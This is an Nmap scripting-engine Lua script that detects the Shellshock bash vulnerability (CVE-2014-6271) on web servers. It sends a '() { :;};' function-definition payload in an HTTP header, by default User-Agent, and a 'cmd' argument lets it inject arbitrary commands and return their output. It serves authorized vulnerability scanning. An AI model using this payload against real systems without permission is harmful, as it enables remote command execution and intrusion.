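description = [[
Attempts to exploit the vulnerability known as "shellshock" against web
applications via HTTP headers. By default it simply echoes back a random string
but other commands may be injected.

To detect this vulnerability the script executes a command that prints a random
string and then looks for it inside the page's body.

Vulnerability originally discovered by Stephane Chazelas.

References:
* http://www.openwall.com/lists/oss-security/2014/09/24/10
* http://seclists.org/oss-sec/2014/q3/685
]]

---
-- @usage
-- nmap -sV -p- --script http-shellshock <target>
-- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-shellshock:
-- |   VULNERABLE:
-- |   HTTP Shellshock vulnerability
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2014-6271
-- |       This web application might be affected by the vulnerability known as Shellshock. It seems the server
-- |       is executing commands injected via malicious HTTP headers.
-- |
-- |     Disclosure date: 2014-09-24
-- |     References:
-- |       http://www.openwall.com/lists/oss-security/2014/09/24/10
-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
-- |       http://seclists.org/oss-sec/2014/q3/685
-- |_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
--
-- @xmloutput
-- <table key="CVE-2014-6271">
--   <elem key="title">HTTP Shellshock vulnerability</elem>
--   <elem key="state">VULNERABLE (Exploitable)</elem>
--   <table key="ids">
--     <elem>CVE:CVE-2014-6271</elem>
--   </table>
--   <table key="description">
--     <elem>This web application might be affected by the vulnerability known as Shellshock. It seems the server is executing commands injected via malicious HTTP headers.</elem>
--   </table>
--   <table key="dates">
--     <table key="disclosure">
--       <elem key="year">2014</elem>
--       <elem key="day">24</elem>
--       <elem key="month">09</elem>
--     </table>
--   </table>
--   <elem key="disclosure">2014-09-24</elem>
--   <table key="refs">
--     <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</elem>
--     <elem>http://www.openwall.com/lists/oss-security/2014/09/24/10</elem>
--     <elem>http://seclists.org/oss-sec/2014/q3/685</elem>
--     <elem>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</elem>
--   </table>
-- </table>
--
-- @args http-shellshock.uri URI. Default: /
-- @args http-shellshock.header HTTP header to use in requests. Default: User-Agent
-- @args http-shellshock.cmd Custom command to send inside payload. Default: nil
---

author = {"Paulino Calderon "}
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit","vuln","intrusive"}

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"

portrule = shortport.http

--- Probes a single HTTP service for Shellshock via an injected header.
--
-- A random marker is sent inside the configured header; the host is reported
-- as vulnerable only when that exact marker appears in the body of a 200
-- response. When the <code>cmd</code> script argument is set, a second request
-- carries the custom command and its raw response body is attached to the
-- report as <code>exploit_results</code>.
--
-- @param host Host table as supplied by Nmap.
-- @param port Port table as supplied by Nmap.
-- @return A vulns report when the marker was echoed back, otherwise nil.
action = function(host, port)
  local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd")
  local http_header = stdnse.get_script_args(SCRIPT_NAME..".header") or "User-Agent"
  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'

  -- The marker is the only evidence of execution this script looks for; the
  -- leading "echo;" terminates the CGI headers so the marker lands in the body.
  local rnd = stdnse.generate_random_string(15)
  local payload = '() { :;}; echo; echo "'..rnd..'"'
  if cmd ~= nil then
    cmd = '() { :;}; '..cmd
  end

  -- Plant the payload in the HTTP headers
  local options = {header = {}, no_cache = true}
  options.header[http_header] = payload
  stdnse.debug(1, "Sending '%s' via HTTP header '%s'", payload, http_header)

  local req = http.get(host, port, uri, options)
  -- A failed or empty response carries no status/body; bail out instead of
  -- indexing nil. The marker is searched as a plain string (4th arg true), not
  -- as a Lua pattern, so no character of the random string is ever treated as
  -- a pattern metacharacter.
  if not (req and req.status == 200 and req.body) then
    return nil
  end
  if not string.find(req.body, rnd, 1, true) then
    return nil
  end

  stdnse.debug(1, "Random pattern '%s' was found in page. Host seems vulnerable.", rnd)

  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  local vuln = {
    title = 'HTTP Shellshock vulnerability',
    -- Marker echoed back means the injected command actually ran.
    state = vulns.STATE.EXPLOIT,
    description = [[
This web application might be affected by the vulnerability known as Shellshock. It seems the server
is executing commands injected via malicious HTTP headers.
]],
    IDS = {CVE = 'CVE-2014-6271'},
    references = {
      'http://www.openwall.com/lists/oss-security/2014/09/24/10',
      'http://seclists.org/oss-sec/2014/q3/685',
      'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169'
    },
    dates = {
      disclosure = {year = '2014', month = '09', day = '24'},
    },
  }

  if cmd ~= nil then
    options.header[http_header] = cmd
    stdnse.debug(1, "Sending '%s' via HTTP header '%s'", cmd, http_header)
    req = http.get(host, port, uri, options)
    -- Raw response body, or nil when the second request produced none.
    vuln.exploit_results = req and req.body
  end

  return vuln_report:make_output(vuln)
end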